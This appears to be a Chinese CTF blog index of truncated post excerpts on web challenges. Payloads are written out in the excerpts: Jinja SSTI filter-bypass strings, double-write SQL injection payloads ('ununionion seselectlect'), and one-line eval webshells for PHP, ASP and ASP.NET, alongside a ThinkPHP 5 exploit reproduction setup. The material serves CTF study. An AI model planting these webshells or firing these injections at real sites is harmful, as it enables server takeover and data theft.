这篇文章受密码保护，输入密码才能阅读

临近期末，确实没有什么时间去复现一些打过的比赛了，考完重新做一下，一方面怕忘了复现，一方面怕资源找的不全，这里先记录一下题目以及trick。 SSTI https://mp.weixin.qq.com/s/_6ObDR5YKpLFoQXTYXE_pQ XNUCA 2020 ezwp 2020 xnuca ezwp题解 xnuca2020 final…

赛后看了writeup，记录几个tricks吧 mine1_1 两行代码等价 {{().__class__}} {{()|attr('__class__')}} 绕过姿势 {{(()|attr(request.values.a)).get(request.values.b).get(request.values.c)(request.values.…

这篇文章受密码保护，输入密码才能阅读

D哥出的签到题 <?php show_source(__FILE__); $dir = './sandbox/'.md5($_SERVER['REMOTE_ADDR']); echo $dir; echo "<br>"; is_dir($dir) ?: mkdir($dir); $line = $_GET['a']; c…

文件上传 一句话木马 PHP <?php @eval($_POST["oatmeal"];?> ASP <%eval request("oatmeal")%> ASP.NET <%@ Page Language="Jscript"%><%eval(Request.Item["oatmeal"…

[SUCTF 2019]CheckIn 题目源码： <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> …

靶机都在BUUCTF上。 【第一章 web入门】 举足轻重的信息收集 常见的收集 手工只找到了robots.txt，剩下两个是敏感泄露文件。 robots.txtindex.php~.index.php.swp 粗心的小李 scrabble CTF中的SQL注入 SQL注入-1 id=3提示加入参数tips=1，输出查询语句： select * f…

[极客大挑战 2019]BabySQL 尝试联合注入 1' union select 1# 发现只报错了1，推测被过滤，双写绕过 1' ununionion seselectlect 1 # 尝试到3后成功注入，有回显 1' ununionion seselectlect 1,2,3# 爆库 1' ununionion seselectlect 1…

环境搭建 在线复现平台 本地复现Github地址 用IDEA调试docker起的环境 官方解释 Thinkphp v5.0.x补丁地址: https://github.com/top-think/framework/commit/b797d72352e6b4eb0e11b6bc2a2ef25907b7756f Thinkphp v5.1.…